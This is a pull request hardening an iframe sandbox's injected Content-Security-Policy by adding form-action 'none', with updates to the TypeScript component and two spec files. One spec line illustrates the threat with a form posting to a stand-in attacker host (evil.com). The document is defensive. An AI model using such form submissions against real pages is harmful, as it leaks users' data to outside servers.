### PR TITLE
fix(security): inject form-action 'none' into WebAppFrameSrcdoc CSP

### DIFF
--- a/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/mcp-apps-component_spec.md
+++ b/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/mcp-apps-component_spec.md
@@ -445,16 +445,16 @@ The host receives the `htmlContent` property from the catalog definition:
 
 ### Content Security Policy configuration
 
-To prevent the application from sending network requests, the proxy injects a Content Security Policy (CSP) tag into the inner frame document head:
+To prevent the application from sending network requests or submitting forms externally, the proxy injects a Content Security Policy (CSP) tag into the inner frame document head:
 
 ```html
 <meta
   http-equiv="Content-Security-Policy"
-  content="default-src 'self' 'unsafe-inline' 'unsafe-eval' data:; connect-src 'none';"
+  content="default-src 'self' 'unsafe-inline' 'unsafe-eval' data:; connect-src 'none'; form-action 'none';"
 />
 ```
 
-This blocks connection protocols like fetch, XHR, WebSockets, and Server-Sent Events, forcing all communication to be routed through the `AppBridge` channel to the host.
+This blocks connection protocols like fetch, XHR, WebSockets, and Server-Sent Events, as well as form submissions and navigations (`form-action 'none'`), forcing all communication to be routed through the `AppBridge` channel to the host.
 
 ### Dynamic resizing controls
 

--- a/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/web-app-frame-srcdoc.ts
+++ b/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/web-app-frame-srcdoc.ts
@@ -111,13 +111,15 @@ export class WebAppFrameSrcdoc extends CatalogComponent<WebAppFrameSrcdocApi> {
    * Injects a Content-Security-Policy (CSP) meta tag into the provided HTML string.
    *
    * Any existing CSP meta tags in the HTML are stripped and replaced with a restricted
-   * default policy (`default-src 'self' 'unsafe-inline' 'unsafe-eval' data:; connect-src 'none';`).
+   * default policy (`default-src 'self' 'unsafe-inline' 'unsafe-eval' data:; connect-src 'none'; form-action 'none';`).
    * The CSP meta tag is injected into the `<head>` element, creating one if necessary.
    *
    * **Expected Effects of the Injected CSP:**
    * - Prevents untrusted HTML from relaxing security policies by overriding preexisting CSP tags.
    * - Blocks all outgoing network connections (`connect-src 'none'`), disabling `fetch`, `XMLHttpRequest`,
    *   `WebSocket`, and `EventSource` calls from within the sandbox iframe.
+   * - Blocks form-based exfiltration (`form-action 'none'`), closing HTML form navigation and submission
+   *   bypasses to external endpoints even when `allow-forms` is enabled in sandbox attributes.
    * - Restricts resource loading (`default-src`) to same-origin scripts/styles (`'self'`), inline code
    *   (`'unsafe-inline'`), dynamic eval execution (`'unsafe-eval'`), and `data:` URIs.
    *
@@ -130,7 +132,7 @@ export class WebAppFrameSrcdoc extends CatalogComponent<WebAppFrameSrcdocApi> {
       '',
     );
 
-    const cspMeta = `<meta http-equiv="Content-Security-Policy" content="default-src 'self' 'unsafe-inline' 'unsafe-eval' data:; connect-src 'none';">`;
+    const cspMeta = `<meta http-equiv="Content-Security-Policy" content="default-src 'self' 'unsafe-inline' 'unsafe-eval' data:; connect-src 'none'; form-action 'none';">`;
 
     if (/(<head[^>]*>)/i.test(result)) {
       result = result.replace(/(<head[^>]*>)/i, `$1\n    ${cspMeta}`);

--- a/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/web-frame-component_spec.md
+++ b/samples/community/client/angular/projects/mcp_calculator/src/a2ui-catalog/web-frame-component_spec.md
@@ -592,7 +592,12 @@ Sandbox to prevent CSRF and exfiltration.
 - **Strict CSP Meta Tag Injection:** Unlike `WebAppFrameUrl`, the renderer receives the raw HTML
   string. It must parse the HTML, strip any author-supplied CSP meta tags, and inject a strict CSP
   meta tag as the first child of the head:
-  `<meta http-equiv="Content-Security-Policy" content="default-src 'self' 'unsafe-inline' 'unsafe-eval' data:; connect-src 'none';">`.
+  `<meta http-equiv="Content-Security-Policy" content="default-src 'self' 'unsafe-inline' 'unsafe-eval' data:; connect-src 'none'; form-action 'none';">`.
+- **Form-Based Exfiltration Prevention (`form-action 'none'`):** When `allow-forms` is included in
+  the iframe sandbox attributes (to allow local interactive form controls), untrusted scripts in
+  `WebAppFrameSrcdoc` could attempt to submit an HTML form (`<form action="https://evil.com/post" method="POST">`)
+  to an external server. Because `connect-src 'none'` only blocks APIs like `fetch` and `XMLHttpRequest`,
+  injecting `form-action 'none';` closes HTML form navigation and submission bypasses.
 - **Double-Iframe Sandboxing (Web Platforms):** A single layer iframe does not offer good isolation.
   Web renderers must load raw HTML via a nested proxy frame (e.g., A2UI Sandbox Proxy). The outer
   same-origin proxy coordinates message transfers, while the inner iframe is strictly sandboxed


### PR DESCRIPTION
# Description

### Overview
When `allow-forms` is enabled in sandbox attributes for `WebAppFrameSrcdoc`, scripts running inside the frame can attempt to submit HTML forms (`<form action="..." method="POST">`) to external endpoints. While `connect-src 'none'` restricts network APIs like `fetch` and `XMLHttpRequest`, it does not block form submissions or navigations.

This change adds `form-action 'none';` to the default Content-Security-Policy meta tag injected into `WebAppFrameSrcdoc` HTML content and updates the relevant component specifications.

### Key changes
* **`web-app-frame-srcdoc.ts`**: Updated `injectCsp()` to include `form-action 'none';` in the injected `<meta http-equiv="Content-Security-Policy">` tag.
* **`web-frame-component_spec.md`**: Updated Section 5.3 to require `form-action 'none';` for `WebAppFrameSrcdoc` implementations.
* **`mcp-apps-component_spec.md`**: Updated Section 5.3 CSP code snippet and explanation to include `form-action 'none';`.




## Pre-launch Checklist

One time:

- [ ] I signed the [CLA].
- [ ] I read the [Contributors Guide].
- [ ] I read the [Style Guide].
- [ ] I have built and run at least one [sample].

For this PR:

- [ ] I have updated the relevant CHANGELOG.md file.
- [ ] I updated/added relevant documentation.
- [ ] My code changes (if any) have tests.
- [ ] If my branch is on a fork, I have verified that [scripts/e2e_test.sh](https://github.com/a2ui-project/a2ui/blob/main/scripts/e2e_test.sh) passes.

If you need help, consider asking for advice on the [discussion board].

<!-- Links -->

[CLA]: https://cla.developers.google.com/
[Contributors Guide]: https://github.com/a2ui-project/a2ui/blob/main/CONTRIBUTING.md
[discussion board]: https://github.com/a2ui-project/a2ui/discussions
[Style Guide]: https://github.com/a2ui-project/a2ui/blob/main/CONTRIBUTING.md#coding-style
[sample]: https://github.com/a2ui-project/a2ui/blob/main/samples/README.md#samples
